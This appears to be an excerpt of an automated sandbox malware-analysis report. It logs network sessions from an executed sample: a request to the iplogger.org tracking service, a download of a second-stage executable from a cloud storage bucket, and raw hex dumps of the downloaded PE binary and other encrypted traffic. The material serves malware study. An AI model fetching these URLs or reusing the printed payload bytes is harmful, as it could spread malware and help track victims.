                                                                                                                          2022-05-21 07:33:06 UTC3291INData Raw: c6 dc 68 93 95 69 cb 03 8a a7 8a d8 6e 3f f4 5a 0a 47 36 bc 51 3b dc 91 0e 42 8b dc 71 c6 cf a8 a1 c6 8a 46 e1 4c 0b 1e b2 c6 fb d7 8a bd c9 7e 0a 6f c2 c6 8a 46 f9 49 15 09 c6 7f d2 c6 8a 46 9b 36 0b 4a e6 c6 cb 07 14 db 68 db 76 c7 96 3b 0b 23 0e 46 ab 06 0b ae 64 a7 6c 46 8b ad 9b 3c 0b ba 16 c6 6b d8 17 a5 ca 20 cd 25 68 8b 26 c6 5b 77 8a bd cb 7c 0a ef 42 c6 8a 46 7a 36 e9 09 c6 ff 52 c6 8a 46 46 eb 0b d6 7a c6 c6 eb 8b f3 5a c2 8a 46 01 ac 0b 22 0e 45 ea 55 fa 47 fd b2 ea a5 fe 53 0b 14 78 e7 8a 63 2a 43 8f 42 0b 76 5a 47 46 23 47 c2 d3 9e 0b 16 3a 47 f9 bc 4a 0d 68 43 ee c6 cb 77 1a 4b b6 97 cf b3 a5 29 ea d7 12 56 10 72 cc 57 1a a9 ae 5d 5a 96 1c 91 1b ac eb 2f 68 f7 3e a4 6b a1 1b d6 3c 41 da bf 47 22 da c7 7a d7 9d 60 5a 56 a9 95 e1 84 c0 a5 ae
                                                                                                                          Data Ascii: hin?ZG6Q;BqFL~oFIF6Jhv;#FdlF<k %h&[w|BFz6RFFzZF"EUGSxc*CBvZGF#G:GJhCwK)VrW]Z/h>k<AG"z`ZV
                                                                                                                          2022-05-21 07:33:06 UTC3297INData Raw: 8b 2e 87 c2 8a 46 dc b7 a8 c2 8a 46 aa 03 0f 47 8b 7e d7 c2 a6 8b 8b 55 fc c2 8a 46 7c 17 ac ca 87 4c 0c 2b 8b 88 21 c2 8a 46 23 8a 0f 47 8b c5 d3 18 0f 47 8b dc 75 c2 8a 46 ff 56 0f 47 8b 11 70 6f 0f 47 8b 63 ca c2 8a 46 9a 33 0f 1f 32 46 7a 10 ae c9 85 45 0a c6 97 3b 67 70 8c 1b 8a 26 8b c7 8b 66 ab 46 93 3e 0b c0 8c c7 c0 0c 8b b6 d3 ec 8c 43 8b 80 e6 68 0f 47 8b ed 44 c2 3b 17 8a d8 75 c7 31 9e 6f 20 8a 14 bd c2 8a 46 89 24 0b aa ce d0 b0 a2 8b 46 93 3e 0b 86 2a c6 0b a7 a3 0a 6e 2d 80 c7 8b 43 6f b8 6a b8 55 9c 51 9c 51 9c 4a 87 f6 73 25 a4 6a 37 94 ca 69 d7 77 c9 05 cb fe 53 0a c6 0a a6 8a 46 8a 46 ca 21 5d 56 c7 8a 0b 1a c3 d2 8c 38 77 ab 62 5f 8a df 95 cb 9a a4 06 ee 2f c7 92 3f 0f a6 79 d0 53 e8 78 23 ea 8f bb 5d 69 63 56 bc 81 ae 89 42 6d a3 6e
                                                                                                                          Data Ascii: .FFG~UF|L+!F#GGuFVGpoGcF32FzE;gp&fF>ChGD;u1o F$F>*n-CojUQQJs%j7iwSFF!]V8wb_/?ySx#]icVBmn


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          25192.168.2.449866148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:04 UTC2402OUTGET /1tEnk7 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                                                          Host: iplogger.org
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2022-05-21 07:33:04 UTC2403INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:33:04 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: clhf03028ja=84.17.52.19; expires=Sun, 21-May-2023 07:33:04 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Set-Cookie: 371745561410413587=2; expires=Sun, 21-May-2023 07:33:04 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Expires: Sat, 21 May 2022 07:33:04 +0000
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2022-05-21 07:33:04 UTC2403INData Raw: 63 64 0d 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 41 43 43 45 50 54 5f 4c 41 4e 47 55 41 47 45 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 36 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: cdNotice: Undefined index: HTTP_ACCEPT_LANGUAGE in /home/www/loggers/index.php on line 16PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          26192.168.2.449868151.115.10.1443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:05 UTC2651OUTGET /nunchucks/rec-fnpj3agqpa83jpen.exe HTTP/1.1
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36;
                                                                                                                          Host: doja-cat.s3.pl-waw.scw.cloud
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-05-21 07:33:05 UTC2731INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 345600
                                                                                                                          x-amz-id-2: txc846bcdae62d4465866dc-00628895b1
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Last-Modified: Mon, 25 Apr 2022 11:20:42 GMT
                                                                                                                          ETag: "6f6d649d2122874fce4eca08c6372db1"
                                                                                                                          x-amz-request-id: txc846bcdae62d4465866dc-00628895b1
                                                                                                                          x-amz-version-id: 1650885642279623
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Date: Sat, 21 May 2022 07:33:05 GMT
                                                                                                                          Connection: close
                                                                                                                          2022-05-21 07:33:05 UTC2732INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 31 7f 66 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 ea 04 00 00 58 00 00 00 00 00 00 de 08 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL1fb.X @ @
                                                                                                                          2022-05-21 07:33:05 UTC2747INData Raw: 00 38 a4 ff ff ff 06 02 28 03 01 00 06 74 09 00 00 01 0b 20 06 00 00 00 38 8d ff ff ff 06 39 1f 00 00 00 28 01 01 00 06 28 00 01 00 06 39 2a 00 00 00 26 20 09 00 00 00 38 6d ff ff ff dd 76 00 00 00 7e 52 00 00 0a 20 0a 0c 00 00 28 f0 00 00 06 28 08 01 00 06 0a 38 93 ff ff ff 26 20 05 00 00 00 16 39 42 ff ff ff 26 07 0c 20 04 00 00 00 28 01 01 00 06 3a 30 ff ff ff 38 2b ff ff ff 07 28 04 01 00 06 3a b8 ff ff ff 20 03 00 00 00 38 16 ff ff ff 07 28 07 01 00 06 39 a3 ff ff ff 20 02 00 00 00 38 01 ff ff ff 03 0c dd 08 00 00 00 26 03 0c dd 00 00 00 00 08 2a 00 41 1c 00 00 00 00 00 00 0e 00 00 00 57 01 00 00 65 01 00 00 08 00 00 00 39 00 00 01 6a 2b 09 28 5f a3 37 46 14 16 9a 26 16 2d f9 28 0b 01 00 06 02 28 0c 01 00 06 2a 00 56 2b 09 28 dc ff 0a 61 14 16 9a 26
                                                                                                                          Data Ascii: 8(t 89((9*& 8mv~R ((8& 9B& (:08+(: 8(9 8&*AWe9j+(_7F&-((*V+(a&
                                                                                                                          2022-05-21 07:33:05 UTC2762INData Raw: ff ff d6 00 00 00 20 01 00 00 00 38 ad ff ff ff 14 2a 08 09 28 b8 01 00 06 13 07 20 10 00 00 00 38 98 ff ff ff 08 28 b7 01 00 06 14 0d 13 04 20 04 00 00 00 38 84 ff ff ff 06 17 8d 3c 00 00 01 25 16 1f 2c 9d 28 b3 01 00 06 16 9a 0a 20 05 00 00 00 17 3a 65 ff ff ff 26 09 3a b3 ff ff ff 20 03 00 00 00 38 54 ff ff ff 06 73 b3 00 00 0a 28 b4 01 00 06 20 aa 23 00 00 28 b1 01 00 06 28 b5 01 00 06 0b 20 0a 00 00 00 28 ae 01 00 06 39 2a ff ff ff 26 11 06 0d 20 00 00 00 00 38 1c ff ff ff 04 28 b0 01 00 06 20 a4 23 00 00 28 b1 01 00 06 28 b2 01 00 06 39 ae ff ff ff 20 09 00 00 00 38 f8 fe ff ff 11 06 07 28 b2 01 00 06 39 9f fe ff ff 20 07 00 00 00 38 e1 fe ff ff 11 07 28 b9 01 00 06 d4 8d 38 00 00 01 13 08 17 28 ae 01 00 06 3a 46 00 00 00 26 20 02 00 00 00 38 21 00
                                                                                                                          Data Ascii: 8*( 8( 8<%,( :e&: 8Ts( #(( (9*& 8( #((9 8(9 8(8(:F& 8!
                                                                                                                          2022-05-21 07:33:05 UTC2778INData Raw: 00 00 38 93 ed ff ff fe 0c 0e 00 20 03 00 00 00 fe 0c 27 00 9c 20 53 00 00 00 38 83 ed ff ff fe 0c 11 00 20 06 00 00 00 20 4e 00 00 00 20 40 00 00 00 59 9c 20 73 01 00 00 38 5c ed ff ff 20 01 00 00 00 20 42 00 00 00 58 fe 0e 27 00 20 7a 01 00 00 fe 0e 32 00 16 39 42 ed ff ff 16 13 01 20 7c 01 00 00 fe 0e 32 00 38 31 ed ff ff fe 0c 11 00 20 06 00 00 00 fe 0c 14 00 9c 20 27 00 00 00 fe 0e 32 00 38 15 ed ff ff 20 bb 00 00 00 20 3e 00 00 00 59 fe 0e 27 00 20 18 00 00 00 38 00 ed ff ff 7e 3a 00 00 04 72 aa 01 00 70 38 0b 06 00 00 38 10 06 00 00 13 23 20 eb 00 00 00 38 d8 ec ff ff fe 0c 0e 00 20 09 00 00 00 fe 0c 27 00 9c 20 ca 00 00 00 fe 0e 32 00 38 c0 ec ff ff fe 0c 0e 00 20 09 00 00 00 20 8f 00 00 00 20 2f 00 00 00 59 9c 20 6f 00 00 00 38 9d ec ff ff fe 0c
                                                                                                                          Data Ascii: 8 ' S8 N @Y s8\ BX' z29B |281 '28 >Y' 8~:rp88# 8 ' 28 /Y o8
                                                                                                                          2022-05-21 07:33:05 UTC2794INData Raw: 9c 20 ca 00 00 00 fe 0e 2d 00 38 46 06 00 00 39 c8 f8 ff ff 11 01 8e 69 8d 38 00 00 01 13 00 20 44 00 00 00 fe 0e 2d 00 38 af f8 ff ff 20 34 00 00 00 20 4c 00 00 00 58 fe 0e 21 00 20 e5 00 00 00 38 9a f8 ff ff fe 0c 03 00 20 1f 00 00 00 fe 0c 21 00 9c 20 1d 01 00 00 fe 0e 2d 00 38 7a f8 ff ff fe 0c 03 00 20 0d 00 00 00 fe 0c 21 00 9c 20 74 00 00 00 38 66 f8 ff ff fe 0c 03 00 20 05 00 00 00 20 be 00 00 00 20 62 00 00 00 59 9c 20 71 00 00 00 38 3f f8 ff ff 11 04 11 04 20 91 ec 13 34 fe 0e 29 00 20 48 85 34 36 fe 0e 05 00 20 2f 07 6e 57 fe 0e 25 00 20 2a d5 cb 14 fe 0e 1f 00 fe 0e 26 00 20 c9 5b 5a 08 fe 0e 1c 00 fe 0c 25 00 fe 0c 05 00 58 fe 0e 25 00 fe 0c 1f 00 fe 0c 05 00 61 fe 0e 1f 00 fe 0c 29 00 76 6c 23 00 00 00 00 00 00 00 00 40 0a 00 00 00 fe 0c 29
                                                                                                                          Data Ascii: -8F9i8 D-8 4 LX! 8 ! -8z ! t8f bY q8? 4) H46 /nW% *& [Z%X%a)vl#@)
                                                                                                                          2022-05-21 07:33:05 UTC2810INData Raw: 00 00 08 00 93 00 05 38 ff 00 78 00 ac 8d 00 00 08 00 93 00 19 38 ff 00 78 00 c0 8d 00 00 08 00 93 00 2d 38 30 01 78 00 dc 8d 00 00 08 00 93 00 41 38 8e 01 79 00 f8 8d 00 00 08 00 93 00 55 38 8e 01 79 00 14 8e 00 00 08 00 93 00 69 38 07 07 79 00 34 8e 00 00 08 00 93 00 ad 38 35 01 79 00 54 8e 00 00 08 00 93 00 c1 38 35 01 79 00 74 8e 00 00 08 00 93 00 d5 38 37 03 79 00 98 8e 00 00 08 00 93 00 e9 38 a8 02 79 00 b0 8e 00 00 08 00 93 00 fd 38 50 01 79 00 d0 8e 00 00 08 00 93 00 11 39 3a 04 79 00 f0 8e 00 00 08 00 93 00 25 39 8e 01 79 00 0c 8f 00 00 08 00 93 00 39 39 3d 02 79 00 34 8f 00 00 08 00 93 00 4d 39 8e 01 79 00 50 8f 00 00 08 00 93 00 61 39 8e 01 79 00 6c 8f 00 00 08 00 93 00 75 39 8e 01 79 00 88 8f 00 00 08 00 93 00 89 39 fa 00 79 00 a4 8f 00 00 08
                                                                                                                          Data Ascii: 8x8x-80xA8yU8yi8y485yT85yt87y8y8Py9:y%9y99=y4M9yPa9ylu9y9y
                                                                                                                          2022-05-21 07:33:05 UTC2826INData Raw: 57 44 76 4a 66 73 33 67 00 6c 72 62 4a 41 61 32 70 4c 77 4c 61 5a 48 68 6c 50 56 58 00 4c 47 51 52 75 37 32 61 42 46 47 74 44 30 79 42 45 64 77 00 41 38 58 69 78 49 77 7a 66 6b 6c 62 64 79 38 6b 6d 6a 51 00 77 34 4f 63 56 64 32 69 37 4f 4a 74 32 6e 74 71 54 42 38 00 65 71 4d 66 56 67 32 6b 35 70 5a 69 68 51 4f 30 55 58 74 00 65 4d 64 38 56 55 32 66 35 63 71 65 4a 30 6f 57 72 39 72 00 50 31 69 37 73 6b 32 39 4c 72 71 54 44 76 54 30 77 57 64 00 55 39 63 36 49 70 32 58 77 70 53 78 64 6a 46 32 44 78 54 00 46 32 4d 38 4c 36 32 57 49 41 36 32 49 4f 30 75 65 41 62 00 6e 67 54 75 42 51 32 50 55 6f 51 43 37 5a 72 67 72 72 46 00 6c 6b 43 51 78 46 32 45 50 33 78 6d 49 31 54 4b 56 75 4b 00 56 44 6a 55 44 34 32 35 69 41 51 6b 32 30 57 61 4a 41 4e 00 6d 31 4d 6a 6e 6c
                                                                                                                          Data Ascii: WDvJfs3glrbJAa2pLwLaZHhlPVXLGQRu72aBFGtD0yBEdwA8XixIwzfklbdy8kmjQw4OcVd2i7OJt2ntqTB8eqMfVg2k5pZihQO0UXteMd8VU2f5cqeJ0oWr9rP1i7sk29LrqTDvT0wWdU9c6Ip2XwpSxdjF2DxTF2M8L62WIA62IO0ueAbngTuBQ2PUoQC7ZrgrrFlkCQxF2EP3xmI1TKVuKVDjUD425iAQk20WaJANm1Mjnl
                                                                                                                          2022-05-21 07:33:05 UTC2842INData Raw: 21 e4 07 1d e8 c8 4d 04 c1 b8 c7 5a e5 d3 e4 90 90 9e 5f 04 7a 12 b6 60 8c 6d 60 12 7f 08 08 b3 01 ef e1 33 6b 58 58 83 3d e5 6a d2 b1 1d 6c d3 80 8f 2b 1e e3 42 01 c8 46 da 7f 97 6b 62 18 95 94 0f 28 02 ae 81 df 04 f3 ac a7 98 e6 88 a4 0e fc a1 4e 66 9c 60 30 05 75 32 d9 79 26 4b 21 1a be ce 7b 8a 24 35 9a 7e 49 c2 09 86 52 46 3a 8e 22 03 97 e6 d1 52 f1 43 35 ce f0 ab ef 81 31 51 c2 42 45 6f c3 a6 48 63 b9 c7 c5 68 71 b3 41 58 f3 53 6e 4c fa 42 44 f3 a1 cd fa 60 e8 e3 12 84 17 50 b8 9b 6a 19 2c b6 4f 89 1f 93 a5 e0 ff 50 8b 4a 9e d0 8b 94 3b 72 33 11 c2 00 cb 72 55 4c c4 0e 0c 33 c1 df 91 b8 72 40 86 c5 8a 38 49 29 8c 02 dd 5c 0b d5 63 3f 95 83 9a f9 9b 77 50 e2 91 55 07 5e 8a 9f de 71 5b 8b 25 02 6e af 02 25 30 87 49 1b 92 26 47 9a 14 79 e7 ad be 88 cd
                                                                                                                          Data Ascii: !MZ_z`m`3kXX=jl+BFkb(Nf`0u2y&K!{$5~IRF:"RC51QBEoHchqAXSnLBD`Pj,OPJ;r3rUL3r@8I)\c?wPU^q[%n%0I&Gy
                                                                                                                          2022-05-21 07:33:05 UTC2858INData Raw: 8c c1 94 26 05 6f 4b 9e 77 03 c1 2e 2d 11 6f a9 3b 15 f6 4d f8 97 d5 81 ae 5e e9 33 5d d8 b7 6d 51 10 a0 ab 47 96 7f c5 cc a2 8a aa 8a a0 98 99 c2 11 6e bc f3 c4 1b aa 64 4e 77 df 0a b3 a6 9e 25 9f 45 25 8f 07 17 5a 1a 8c f1 21 5d 34 7f bd 1c b6 05 68 fe 85 b1 b8 9c 34 7d 4a 20 4a db 83 bc 3d df 78 87 63 e6 e1 bf 22 97 78 52 6f 43 10 72 c7 99 9f 6a ae 2f 61 07 b1 92 f0 26 58 d0 c2 75 08 49 9c d1 5d fe c9 89 5e d9 a8 75 42 b3 95 e6 aa b8 52 ee a2 71 8e a2 73 0b 0b 74 40 c1 0b 2d d2 53 8f 69 fe 0e 3f 24 95 cf a8 47 89 e2 24 a3 6b 5d 05 e0 c9 10 26 7d 34 b6 40 06 28 d5 c7 11 43 c4 7b 4b 71 a9 91 11 d1 e1 14 18 8c a9 bd 74 dd cf f3 0a 8d fe 99 2b a1 eb b4 87 19 72 05 2f 30 f0 22 0c 2c 74 47 af e6 4d df 2f 25 32 8b f0 bd 4a 68 42 f1 88 69 06 6e e5 77 9a c3 9a
                                                                                                                          Data Ascii: &oKw.-o;M^3]mQGndNw%E%Z!]4h4}J J=xc"xRoCrj/a&XuI]^uBRqst@-Si?$G$k]&}4@(C{Kqt+r/0",tGM/%2JhBinw
                                                                                                                          2022-05-21 07:33:05 UTC2874INData Raw: 9e 74 76 49 24 ce 79 96 65 c6 29 04 92 c8 e8 e4 d3 29 27 84 c9 c7 94 c6 7d 20 e7 7f bc 4e b1 3a 7b 12 d6 51 1a 77 53 a3 ee 6f a6 2b c2 52 27 00 75 27 03 e0 6d c2 30 e4 81 78 a2 6e 37 92 71 9a 8f a6 98 15 43 a4 30 07 ea 2c ec 1c d5 2d a1 f1 ec df ef b6 24 02 58 5d 14 6f 07 bf 88 8a be 0e 1d 1d c7 65 d7 27 b3 6f 50 ce d3 83 63 18 dd 84 8d fe 30 ea 28 cc cc 43 2d 70 15 49 dc 90 91 2b 55 f4 da f4 39 85 9c f9 87 a9 0b 64 dd dd 86 08 2e 38 ec 0c 74 2a a9 03 12 16 89 40 67 d0 44 c7 7e d7 a7 d3 49 48 7b a9 b4 60 0e 83 ec b7 42 45 4b 68 b0 97 95 09 e5 52 2a 00 4d da b8 72 77 dc 32 ae ca d6 01 82 af d6 48 02 52 be 7d c3 ac 79 04 f0 69 6b 8d f2 e8 07 31 9a 97 c4 f5 1f f9 5d a3 7e 6b 29 ed a6 c3 31 fe aa 6d b3 e9 5a bf 72 2b a8 68 68 1a 3e 82 c3 b9 5a 66 9b 3d ed 67
                                                                                                                          Data Ascii: tvI$ye))'} N:{QwSo+R'u'm0xn7qC0,-$X]oe'oPc0(C-pI+U9d.8t*@gD~IH{`BEKhR*Mrw2HR}yik1]~k)1mZr+hh>Zf=g
                                                                                                                          2022-05-21 07:33:05 UTC2890INData Raw: 54 2d b6 2b 9f 1f 53 6c 12 55 31 10 7c b7 fe 5f fb 84 48 28 0e be b3 ff d2 52 83 0a 4c f9 65 8a e4 f4 e6 f9 17 b1 21 22 9f e6 11 d9 32 c5 a2 cd 6e 64 8b 22 9a 1a 02 54 61 26 c8 d8 dd c7 37 a4 22 a1 90 3e 3e 41 8f 95 67 48 d8 ec 0c 4d 09 a5 d1 b2 2f ae e6 6d a3 c5 ce 10 c3 5e 9f 5f 88 1b 6f bc 5d c3 88 2b 6b 29 a0 79 7f 57 76 5c 1b 66 00 dc 5c 67 dc 8c 11 49 5f 97 04 fa 36 3f 6d d3 8c 37 ba 4f 34 4b 84 d6 43 a3 1b 6b 9a 3d a1 83 fb 62 ae 75 ed 87 f3 cd b8 27 2f d7 df 05 12 8f 9b 1a d7 78 13 03 da 53 8d f4 22 d0 70 c2 3c ae 6f 70 82 25 83 90 ab 30 76 e8 f1 99 20 5d fe 13 b4 14 2b 5e 93 5e ce 1e 47 ee b9 79 8a 14 97 3d 25 c1 41 22 69 32 19 2c 92 77 e9 b0 7d 3a 6f e1 cf 46 07 82 a3 e3 2b 12 cc 6a 36 9d 30 f5 a4 b0 8b c0 a9 75 ea 93 e5 38 b5 cf 3a 97 8a 66 c9
                                                                                                                          Data Ascii: T-+SlU1|_H(RLe!"2nd"Ta&7">>AgHM/m^_o]+k)yWv\f\gI_6?m7O4KCk=bu'/xS"p<op%0v ]+^^Gy=%A"i2,w}:oF+j60u8:f
                                                                                                                          2022-05-21 07:33:05 UTC2906INData Raw: df 7b 7a d7 f2 d5 3d d9 9b 8a b4 f6 51 d7 7e 8e 83 b8 08 14 98 7e ac 46 65 61 a5 e1 d8 01 ca 9a d0 7c 64 98 02 34 9c af 99 c4 db e3 66 16 45 fa ca 07 1f 68 c2 12 f0 83 34 e7 fb 08 db 59 0d 1a 5e 34 14 bd 44 5c 86 e1 0d 96 27 09 1f 6b 13 3a 9f 98 4d ad 0c b6 b7 44 bc 83 d8 ba c5 b0 4f cf 1a d1 51 9e 53 2a 24 9f 87 45 96 12 69 29 13 03 26 dc 94 d8 0f f9 6e af 04 c7 8e 90 06 c4 50 d1 fe 65 08 f0 e8 f6 9d 16 6f 22 5f c2 d5 9c 5a c6 43 83 97 dd 1f 5d 87 97 4d 9b 15 44 e0 b3 84 f2 fb b5 45 d4 1a c9 aa 5e 26 a8 13 b6 f7 66 48 cf 65 7b 30 24 00 75 5e 70 d6 03 c7 69 11 1e 37 e9 ef e3 80 6b d6 c6 c7 09 84 22 5f 67 1e 89 9d 12 91 27 96 23 99 87 8f 21 03 31 2e d0 52 9e b3 b9 cf ee df f7 12 35 43 b0 da 52 dd 21 05 66 b5 ba a8 9d fc e4 ad f9 a8 d1 7c 37 13 36 93 67 91
                                                                                                                          Data Ascii: {z=Q~~Fea|d4fEh4Y^4D\'k:MDOQS*$Ei)&nPeo"_ZC]MDE^&fHe{0$u^pi7k"_g'#!1.R5CR!f|76g
                                                                                                                          2022-05-21 07:33:05 UTC2922INData Raw: a6 06 f0 72 18 80 f6 6a ee f2 41 63 fd b2 dc 8d 83 ee 04 96 0f 82 21 46 6d df c1 e1 b5 bb cc 99 0d 67 e7 90 0d ee 7b c6 39 ed 54 86 3c 67 a2 1b 14 b6 c1 28 3d 2a 32 5a e1 96 e1 d8 27 62 62 01 fe 27 24 1b d2 dd 66 93 41 e5 2b a7 06 f8 ab f3 c6 96 ae 46 bb ec c0 dd 50 9e 15 fa a2 24 9a e4 61 39 ec c0 ea 75 47 d7 e0 d6 ad d7 06 0e 26 70 89 f0 89 5c 33 be c2 cf 82 d1 12 7a 3a 3c ab 0e be d2 0f 12 41 88 73 05 5b c7 d2 8c 67 54 ec 6b 91 d3 2f 9c 6c f4 10 b4 84 53 71 91 ef de 9a 41 77 34 f5 eb da b1 b2 de 07 00 37 94 01 58 3b 56 04 1c ab aa 41 f4 cd c9 f9 5d c5 90 81 ce fe 0c 13 65 4d 60 dc cd 28 0d 1e 32 7a 24 63 f5 69 f3 b7 23 83 63 3f 1d 11 e0 33 49 51 67 43 d6 53 b9 c2 dd 17 76 52 2d a9 0a 23 2a ee 14 9f 5e 05 cb 3d 8f bd 3f ef 42 67 02 e4 d6 9c 2a 45 ce f5
                                                                                                                          Data Ascii: rjAc!Fmg{9T<g(=*2Z'bb'$fA+FP$a9uG&p\3z:<As[gTk/lSqAw47X;VA]eM`(2z$ci#c?3IQgCSvR-#*^=?Bg*E
                                                                                                                          2022-05-21 07:33:05 UTC2938INData Raw: 28 68 eb 62 31 34 51 cc 73 59 33 31 70 f3 eb 37 87 f0 77 32 28 cf 74 66 0a c9 89 18 29 cb ee ac 0b dc 4f 22 63 30 d8 25 f4 36 a7 ba 89 fd b6 49 d7 04 de be f3 c8 68 22 c7 31 67 d0 02 fa a3 44 33 7f fe 2b ae 06 df 15 ab 26 50 bb b0 35 5b 7c e5 b4 18 64 65 d6 df 76 14 af 28 92 ac 0a 46 30 63 9e 76 2b 2b 66 1a c9 99 d3 e5 72 d5 3b 73 c9 54 77 4f a1 a0 86 48 8e 71 a1 48 b2 68 12 82 6f 08 40 6d dd 16 29 24 e7 46 51 f9 d8 d6 39 ab fc d1 49 b7 28 c3 58 c7 c7 2f 7b 81 a0 c6 e3 74 b3 20 be 9f c6 20 0a cb 98 98 96 5c d7 f9 c8 a4 e4 8a c8 9f e2 bf 91 bc 3f ee 5a a2 ef f4 84 c7 66 13 8a 7f 95 1e f1 e1 96 2a 36 16 67 72 82 ab bb 09 b7 8f 68 4a 6f 53 b5 08 60 b5 42 9b be 5b f4 63 c1 47 45 c0 18 79 4a 17 07 13 5e 9a 2b fd eb 38 72 50 38 c7 00 14 12 58 96 ee 1d e1 4c 39
                                                                                                                          Data Ascii: (hb14QsY31p7w2(tf)O"c0%6Ih"1gD3+&P5[|dev(F0cv++fr;sTwOHqHho@m)$FQ9I(X/{t \?Zf*6grhJoS`B[cGEyJ^+8rP8XL9
                                                                                                                          2022-05-21 07:33:05 UTC2954INData Raw: a8 82 cd 37 d9 04 1e f2 4f 76 a7 8c 8e e2 ff 1f 91 56 65 f6 ec 9a ef 10 fc 27 38 3c e0 f8 5f 54 92 54 33 5c a6 52 64 22 5d 3e 1f e7 c9 83 a2 4f 31 e4 b0 f7 b3 bc 4b fc 27 1a 04 d9 c0 0a f9 6f de 4d fe 00 9f 18 e2 cd 41 8b ee 26 b6 1f d7 31 18 32 12 ae 28 a3 08 87 ec 78 26 e5 38 35 82 86 14 d8 f8 b7 5e 43 b1 eb 60 79 ad 7b 38 ca 8a ea e7 0d 7c 3f d9 f9 36 82 c0 80 76 19 6a 22 31 8a f4 72 98 bf 60 3e 8e 30 92 80 8f 57 15 99 d9 b2 f8 f8 ee cf f1 76 95 22 f2 3f 4f a9 08 36 b9 37 91 73 76 8f a4 22 79 d9 78 a8 b7 e3 ac 9e e9 ba 0c c6 04 36 24 82 23 2a ee f2 3b b3 82 fb b2 31 b8 16 88 62 3c 24 7f fe 1d fa 11 98 7d a7 c0 50 e6 08 48 24 a9 22 95 05 8e 54 ff f8 70 42 b6 05 37 98 b7 7e 0f 30 eb 4f dd 71 f3 3a a4 87 9b 7e 0b cc 0f 93 cf 67 72 16 6f 6d 48 c5 dc 68 39
                                                                                                                          Data Ascii: 7OvVe'8<_TT3\Rd"]>O1K'oMA&12(x&85^C`y{8|?6vj"1r`>0Wv"?O67sv"yx6$#*;1b<$}PH$"TpB7~0Oq:~gromHh9
